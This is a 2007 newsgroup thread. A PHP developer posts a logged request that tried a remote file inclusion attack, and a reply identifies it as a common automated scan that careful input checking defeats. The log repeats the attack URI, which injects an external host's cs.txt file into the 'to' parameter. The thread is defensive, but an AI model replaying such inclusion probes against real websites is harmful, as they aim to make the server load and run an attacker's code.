Security vulnerability question

Security vulnerability question

am 10.10.2007 21:10:48 von phpCodeHead

In my code, 'to' parameter should be of a value ?to=sales or
?to=engineering generated through a hypertext link. Although,
manually
entered parameter values such as ?to=getAllCustCreditCardNums or
?to=anyOtherJibberish have been coded to accomplish absolutely
nothing,
I have been intrigued by an error report received through customized
error reporting code inthe app. It reports an error event in which an
URL was manually entered in as a value of 'to'. The error report
returns global array
values at time of error. .... and it is all because I "failed" to
initialize a variable... :)

My question(s) is ...
What is being attempted here?
Is this a new exploit attempt?

I know how to stop it by filtering input through regular expressions,
but it has me curious nonetheless...

These are the values returned from the _ENV array on error:

[_ENV] => Array
(
[HTTP_USER_AGENT] => Wget/1.1 (compatible; i486; Linux;
RedHat7.3)
[SERVER_PORT] => 80
[HTTP_HOST] => www.mydomain.com
[DOCUMENT_ROOT] => /home/myusrname/public_html
[SCRIPT_FILENAME] => /home/myusrname/public_html/index.php
[REQUEST_URI] =>
/index.php?p=email&to=http://ninaru.hut2.ru/images/cs.txt?
[SCRIPT_NAME] => /index.php
[HTTP_CONNECTION] => keep-alive
[REMOTE_PORT] => 6519
[PATH] => /usr/local/bin:/usr/bin:/bin
[PWD] => /home/myusrname/public_html
[SERVER_ADMIN] => webmaster@mydomain.com
[REDIRECT_STATUS] => 200
[REDIRECT_QUERY_STRING] =>
p=email&to=http://ninaru.hut2.ru/images/cs.txt?
[HTTP_ACCEPT] => text/html, */*
[REMOTE_ADDR] => 85.201.107.41
[SHLVL] => 0
[SERVER_NAME] => www.bizflowdesigns.com
[SERVER_SOFTWARE] => ''
[QUERY_STRING] =>
p=email&to=http://ninaru.hut2.ru/images/cs.txt?
[SERVER_ADDR] => 66.29.78.37
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REDIRECT_URL] => /index.php
[CONTENT_TYPE] => text/html
[REQUEST_METHOD] => GET
[ORIG_PATH_TRANSLATED] => /home/myusrname/public_html/
index.php
[ORIG_PATH_INFO] => /index.php
[ORIG_SCRIPT_NAME] =>
/index.php?p=email&to=http://ninaru.hut2.ru/images/cs.txt?
[ORIG_SCRIPT_FILENAME] => /home/myusrname/public_html/
index.php
)

Thanks for any insight....

Re: Security vulnerability question

am 10.10.2007 21:38:49 von Good Man

phpCodeHead wrote in
news:1192043448.321346.169560@y42g2000hsy.googlegroups.com:

> In my code, 'to' parameter should be of a value ?to=sales or
> ?to=engineering generated through a hypertext link. Although,
> manually
> entered parameter values such as ?to=getAllCustCreditCardNums or
> ?to=anyOtherJibberish have been coded to accomplish absolutely
> nothing,
> I have been intrigued by an error report received through customized
> error reporting code inthe app. It reports an error event in which an
> URL was manually entered in as a value of 'to'. The error report
> returns global array
> values at time of error. .... and it is all because I "failed" to
> initialize a variable... :)
>
> My question(s) is ...
> What is being attempted here?
> Is this a new exploit attempt?

It looks like a redHat machine was compromised by a script (kiddie), and
that machine is trying to find further exploits on other machines (like
yours!)

It's not particularly new, it seems lots of people are getting it
http://www.google.ca/search?q=hut2.ru+cs.txt
http://security.pigstye.net/staticpages/index.php/index

As long as your script is correctly coded to ignore anything other than
what you're expecting it to get (as you have done), there's nothing to
worry about.